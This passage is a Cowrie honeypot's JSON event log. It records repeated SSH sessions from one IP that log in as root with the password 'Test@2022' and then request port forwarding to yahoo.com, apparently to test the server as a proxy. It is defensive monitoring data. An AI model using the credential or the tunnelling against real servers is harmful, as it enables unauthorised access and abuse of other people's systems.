-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.833746Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.115661Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20935,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20935","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.173115Z","session":"3162a14acb86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.229863Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14057,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14057","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.386923Z","session":"3162a14acb86"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.443526Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.501698Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48412,"dst_ip":"1.2.3.4","dst_port":22,"session":"e816f49e2e2f","protocol":"ssh","message":"New connection: 213.209.150.239:48412 (1.2.3.4:22) [session: e816f49e2e2f]","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.547697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.548428Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.595507Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.830045Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29732,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29732","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.877977Z","session":"e816f49e2e2f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:35.925492Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":20253,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20253","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.061370Z","session":"e816f49e2e2f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.108507Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.156369Z","src_ip":"213.209.150.239","session":"e816f49e2e2f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48527,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e83636838f","protocol":"ssh","message":"New connection: 213.209.150.239:48527 (1.2.3.4:22) [session: a5e83636838f]","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.211880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.212678Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.269338Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.551181Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17823,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17823","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.609419Z","session":"a5e83636838f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.665949Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18006,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18006","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.819011Z","session":"a5e83636838f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.875560Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.932897Z","src_ip":"213.209.150.239","session":"a5e83636838f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48588,"dst_ip":"1.2.3.4","dst_port":22,"session":"45502648cce1","protocol":"ssh","message":"New connection: 213.209.150.239:48588 (1.2.3.4:22) [session: 45502648cce1]","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.988675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:36.989574Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.046019Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.328825Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27773,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27773","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.386913Z","session":"45502648cce1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.443658Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":15883,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15883","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.599089Z","session":"45502648cce1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.656047Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.713563Z","src_ip":"213.209.150.239","session":"45502648cce1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48667,"dst_ip":"1.2.3.4","dst_port":22,"session":"358a4ed079c4","protocol":"ssh","message":"New connection: 213.209.150.239:48667 (1.2.3.4:22) [session: 358a4ed079c4]","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.769428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.770934Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:37.827591Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.110215Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10264,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10264","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.167870Z","session":"358a4ed079c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.224700Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5008,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5008","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.379045Z","session":"358a4ed079c4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.435754Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.494350Z","src_ip":"213.209.150.239","session":"358a4ed079c4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48733,"dst_ip":"1.2.3.4","dst_port":22,"session":"20750ab155d5","protocol":"ssh","message":"New connection: 213.209.150.239:48733 (1.2.3.4:22) [session: 20750ab155d5]","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.550199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.550989Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.607986Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.890276Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":31863,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31863","sensor":"my-vps","timestamp":"2025-08-26T01:07:38.947962Z","session":"20750ab155d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.004870Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2116,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2116","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.163224Z","session":"20750ab155d5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:39.219963Z","src_ip":"213.209.150.239","session":"20750ab155d5"}
